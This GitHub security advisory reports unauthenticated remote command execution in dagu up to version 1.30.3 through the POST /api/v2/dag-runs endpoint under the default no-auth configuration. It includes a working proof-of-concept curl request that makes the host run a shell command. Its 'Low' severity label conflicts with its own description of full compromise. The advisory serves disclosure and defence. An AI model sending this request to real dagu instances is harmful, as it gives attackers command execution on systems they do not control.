Skip to content

Unauthenticated RCE via inline DAG spec in default configuration

Low
yohamta0 published GHSA-6qr9-g2xw-cw92 Feb 19, 2026

Package

gomod github.com/dagu-org/dagu (Go)

Affected versions

<= 1.30.3

Patched versions

None

Description

Summary

Dagu's default configuration ships with authentication disabled. The POST /api/v2/dag-runs endpoint accepts an inline YAML spec and executes its shell commands immediately with no credentials required — any dagu instance reachable over the network is fully compromised by default.

Details

internal/service/app/config/loader.go:226 sets AuthModeNone as the default. With no auth mode configured, internal/frontend/api/v2/handlers/api.go:520 returns nil from requireExecute() — all permission checks pass without a valid session.

The POST /api/v2/dag-runs endpoint accepts a spec field containing a full YAML DAG definition. The spec is parsed and the commands execute immediately on the host with no validation beyond YAML parsing.

PoC

curl -s -X POST http://TARGET:8080/api/v2/dag-runs \
  -H "Content-Type: application/json" \
  -d '{"name":"poc","spec":"steps:\n  - name: rce\n    command: id > /tmp/pwned\n"}'
# Response: {"dagRunId":"<uuid>"}
# /tmp/pwned contains: uid=1000(dagu) gid=1000(dagu)

Confirmed on ghcr.io/dagu-org/dagu:latest with no configuration changes.

Impact

Every dagu deployment using default settings — every Docker deployment, every install following the documentation, every instance without explicit DAGU_AUTH_MODE configuration — is fully compromised without credentials. An attacker with network access gets OS command execution as the dagu process user.

Severity

Low

CVE ID

No known CVE

Weaknesses

Missing Authentication for Critical Function

The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Learn more on MITRE.

Credits